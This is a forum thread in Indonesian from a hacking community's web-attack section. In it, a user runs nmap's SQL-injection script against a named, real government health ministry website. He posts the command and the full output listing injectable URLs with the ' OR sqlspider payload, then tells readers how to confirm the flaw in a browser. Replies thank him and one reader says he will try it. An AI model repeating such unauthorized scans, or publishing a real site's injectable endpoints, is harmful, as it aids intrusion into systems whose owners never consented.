+- BackBox Indonesia (https://www.backboxindonesia.or.id)
+-- Forum: Attacking (https://www.backboxindonesia.or.id/forum-12.html)
+--- Forum: Web Attack (https://www.backboxindonesia.or.id/forum-15.html)
+--- Thread: Scan vuln sql injection with NMAP (/thread-15.html)
Pages:
1
2
Scan vuln sql injection with NMAP - teh - 03-09-2016
saya mau sharing tentang mencari celah sql injection dengan script yang ada di NMAP. maaf bila ada kesalahan mohon di koreksi mastah :blush:
command line yang saya gunakan
Code:
nmap -sV --script=http-sql-injection www.target.com -Pn -p 80keterangan :
-sV : untuk mendeteksi versi pada sistem operasi
--script : untuk memanggil script nmap yang akan di gunakan (untuk mencari script nmap yang lain nya ketik locate *.nse)
-Pn : untuk melewati proses identifikasi host yang sedang hidup (no ping)
-p : port yang digunakan
disini saya akan test situs http://www.depkes.go.id
Code:
tehmanis@0dayWL:~$ nmap -sV --script=http-sql-injection www.depkes.go.id -Pn -p 80
Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-10 03:01 EST
Nmap scan report for www.depkes.go.id (202.70.136.4)
Host is up (0.026s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.15 ((Oracle))
|_http-server-header: Apache/2.2.15 (Oracle)
| http-sql-injection:
| Possible sqli for queries:
| http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
| http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider
| http://www.depkes.go.id/?pg=profil_kesehatan_provinsi%27%20OR%20sqlspider&act=page
| http://www.depkes.go.id/pdf.php?id=a01%27%20OR%20sqlspider
| http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
| http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider
| http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
| http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider
| http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider
| http://www.depkes.go.id/?pg=profil_kesehatan_provinsi%27%20OR%20sqlspider&act=page
| http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
| http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
| http://www.depkes.go.id/pdf.php?id=16030500001%27%20OR%20sqlspider
| http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider
| http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
| http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider
| http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
|_ http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 71.95 secondsnah ternyata pada situs tersebut terdapat vulneralbility sql injection, untuk memastikan nya kita buka browser lalu copas salah satu link vuneralbility nya
contoh :
Code:
http://www.depkes.go.id/index.php?lg=LN01tambahkan kutip pada akhir alamat url, dan ini hasil nya.
![[Image: 10qb7e1.jpg]](http://i63.tinypic.com/10qb7e1.jpg)
ini saya buat video nya juga cekidoot
semoga bermanfaat dan mohon maaf bilang banyak salah dalam thread ini :blush:
RE: Scan vuln sql injection with NMAP - Aiden_ - 03-10-2016
wahh coba dalam bentuk tulisan bang :D
trus ada penjelasan di setiap paramter yang digunakan :v
RE: Scan vuln sql injection with NMAP - teh - 03-10-2016
(03-10-2016, 12:56 AM)Aiden_ Wrote: wahh coba dalam bentuk tulisan bang :D
trus ada penjelasan di setiap paramter yang digunakan :v
mkasih saran nya om. .maaf masih awam sama forumer :3
RE: Scan vuln sql injection with NMAP - Code Sec7or - 03-10-2016
Mantab,mas..
Ijin coba dulu dah..
RE: Scan vuln sql injection with NMAP - Aiden_ - 03-10-2016
(03-10-2016, 07:37 AM)teh Wrote:maaf nii ada sedikit koreksi(03-10-2016, 12:56 AM)Aiden_ Wrote: wahh coba dalam bentuk tulisan bang :D
trus ada penjelasan di setiap paramter yang digunakan :v
mkasih saran nya om. .maaf masih awam sama forumer :3
biar lebih tepat penjelasan paramter -sV menurut yang yang juga msh belajar itu
-sv = service version scanning jadi kalau versi pada system operasi agak kurang tepat :D
tapi mgkin ane yang salah :3
RE: Scan vuln sql injection with NMAP - kalong404 - 03-10-2016
Lumayan ilmu nya om..
RE: Scan vuln sql injection with NMAP - teh - 03-10-2016
(03-10-2016, 11:04 AM)Aiden_ Wrote:wah mkasih lg om :D klo dari nmap --help fungsi -sV scanning fungsi ke database nya yaa kaya contoh di atas muncul versi DB oracle(03-10-2016, 07:37 AM)teh Wrote:maaf nii ada sedikit koreksi(03-10-2016, 12:56 AM)Aiden_ Wrote: wahh coba dalam bentuk tulisan bang :D
trus ada penjelasan di setiap paramter yang digunakan :v
mkasih saran nya om. .maaf masih awam sama forumer :3
biar lebih tepat penjelasan paramter -sV menurut yang yang juga msh belajar itu
-sv = service version scanning jadi kalau versi pada system operasi agak kurang tepat :D
tapi mgkin ane yang salah :3
RE: Scan vuln sql injection with NMAP - Aiden_ - 03-11-2016
(03-10-2016, 02:42 PM)teh Wrote:yaa emg bener, kan itu nama service nya apache, jadi itu di discloure versi dari service apache nya(03-10-2016, 11:04 AM)Aiden_ Wrote:wah mkasih lg om :D klo dari nmap --help fungsi -sV scanning fungsi ke database nya yaa kaya contoh di atas muncul versi DB oracle(03-10-2016, 07:37 AM)teh Wrote:maaf nii ada sedikit koreksi(03-10-2016, 12:56 AM)Aiden_ Wrote: wahh coba dalam bentuk tulisan bang :D
trus ada penjelasan di setiap paramter yang digunakan :v
mkasih saran nya om. .maaf masih awam sama forumer :3
biar lebih tepat penjelasan paramter -sV menurut yang yang juga msh belajar itu
-sv = service version scanning jadi kalau versi pada system operasi agak kurang tepat :D
tapi mgkin ane yang salah :3
coba kalau ente punya server, ente disable semua service yang berjalan pada port2 yang ingin di scan
kira versi nya akan keluar apa kagak :D
RE: Scan vuln sql injection with NMAP - teh - 03-11-2016
hmm gitu yaa proses nya mkasih kang aiden nambah ilmu lg nih saya :D
RE: Scan vuln sql injection with NMAP - kcnewbie - 03-11-2016
wiiihh mantap